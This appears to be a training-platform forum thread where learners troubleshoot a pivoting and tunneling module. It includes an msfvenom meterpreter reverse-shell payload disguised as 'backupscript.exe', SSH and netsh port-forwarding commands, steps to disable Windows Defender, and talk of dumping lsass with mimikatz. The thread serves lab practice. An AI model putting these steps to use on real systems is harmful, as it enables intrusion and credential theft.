Pivoting, tunneling, and port forwarding | Academy

Ok, took a break and solved this.

  1. reset machine
  2. Turn off everything in the Virus & Threat protection settings and add the htb-user folder and file to the Exclusions list.
  3. run Powershell as Administrator
  4. run regsvr32.exe SocksOverRDP-Plugin.dll
4 Likes

Hi god_f3lla! did everything like you did, he writes to me ā€œcheck if the module is compatible with x86 (32-bit) or x64 (64-bit) regsvr32.exeā€ What is it? and why do I have windows 64-bit, and regsvr32.exe?

Hello,

I have troubles finding any domain hosts in the last two questions of Skill Assessment. Also seems like DNS server at 172.16.10.5 is not responding. Am I missing something?

Hey ! I havenā€™t gotten to that yet. Did you have any problems with the previous page?

Hi I am stuck on the part where I need 2 get a reverse tunnel from the Windows host to my attack host.
I am unable to get a reverse using the reverse_https payload.
My pivot machine has a listening port 127.0.0.1:8080 and forward to 0.0.0.0:8000, but I think this is wrong. I cant connect on 172.16.5.15:8080 it will give connection refused.
When i connect locally to 127.0.0.1:8080 it gets forwarded. How can I make it so that it listens on its internal IP instead of its loopback address?

Hi can you still remember what u did here? I am unable to get the reverse tunnel setup. Also you post kind of confuses me.
U set LPORT=8000 in msfvenom, but u set the reverse tunnel up with port 8080.
Could you try to set this up again and tell me what I am doing wrong?

pivot host has 172.16.5.15 and 10.129.x.x
my attack host has 10.129.x.x
the 2 host has 172.16.5.35 and 172.16.6.35

msfvenom -p windows/x64/meterpreter/reverse_https lhost=172.16.5.15 -f exe -o backupscript.exe LPORT=8080

ssh -R 172.16.5.15:8080:0.0.0.0:8000 webadmin@10.129.x.x -vN -i id_rsa
The pivot host is now listening on 127.0.0.1:8080 and forward to 0.0.0.0:8000

I have a multi/handler listening on 0.0.0.0:8000

connection never gets through it does now even appear at 172.16.5.15

Iā€™m really stuck here and i really need help

Ok so Iā€™m stuck on the last two questions on the Skill Assessment
Been told there is no requirement to scan the full /16
When I scan the two networks that are present there are literally no other hosts
I even tried scanning the DNS subnet and nothing?

What am I missing?

Many Thanks

I had the very same issue, it seems like the box which you need to discover is not responding to ICMP packets reliably or quickly enough. I had to run the ping sweep several times to find it. Just try to increase the number of ICMP packets sent to each host or increase the timeout. Alternatively, sent me DM and Iā€™ll send you the IP address :slight_smile:

1 Like

Thank you for your advice. Since reading it I have managed to find a host and finish it off. Very much appreciated!!

how can i upload the SocksOverRDP-x64.zip, i tried with a python server but it gives me this error

UPDATE: Solved

got it

Something I wanna say about RDP and SOCKS Tunneling with SocksOverRDP:
It just didnā€™t work for meā€¦
I was at the last step where you have to use Proxifier, and I did everything like the guide said, but I could not connect to the targetā€¦
I deffenatly got the idea of the lesson, so i justwanted to get the flag after like 6 hours of tryingā€¦

So if you are in the same situation, just connect to the proxy-windows-machine, from there connect to 172.16.5.19 (like in the guide) and there also start Remote Desktop connection, and connect to you target (172.16.6.155) with victorā€™s credentials (jasonā€™s creds didnā€™t work). So victor has admin privilages at the target, so just go to the jasonā€™s folder and get the flag :wink:

P. S.: I am not a fan of this cheating, and still reccomend to try the normal way of doing this task, but I just wanna give some solution for people who are really stuck

5 Likes

Hi pavka,

Did you manage the skill assessment? I am legit stuck I canā€™t do ssh because I got permission denied and when I look under webadmin directory I see an openSSH private key although when I use it performing chmod 600 I am getting an ā€œFailed to load key id_rsa: error in libcryptoā€ what am I doing wrong? am I missing something, please any help to all those who managed to complete the skill assessment. Much appreciate for your help.

latest update

got it working and found a way to pivot to the user ā€œmā€¦ā€ using metasploitā€¦

now I am stuck again I see vfrank and I tried to dump the lsass using mimikatz , got several NTLM hashes none of them are crackable, not sure what to do next any help? :frowning:

I finally got the module done, wow what a skill assessment all worth the pain tho! :slight_smile:

2 Likes

Hi Pavkov, thanks. I was in the exact same spot. The final step and the provided Jason creds just did not work, whichever way i tried it. Vic worked, thanks. I think this module definitely needs an update. Also with the whole ptunnel-ng and chisel fiasco. Itā€™s just a bad module.

1 Like

Lab solved.
Answer was in plain sight.

Hello! Iā€™ve been strugglin with the Port Forwarding with Windows Netsh for a while!
Could it be that the command Iā€™m supposed to enter:

netsh.exe interface portproxy add v4tov4 listenport=8080 listenaddress=10.129.15.150 connectport=3389 connectaddress=172.16.5.25

is incorrect?!?!

Once you make your initial foothold you will be RDPā€™ing through every other internal IP target. You will not have to use netsh.exe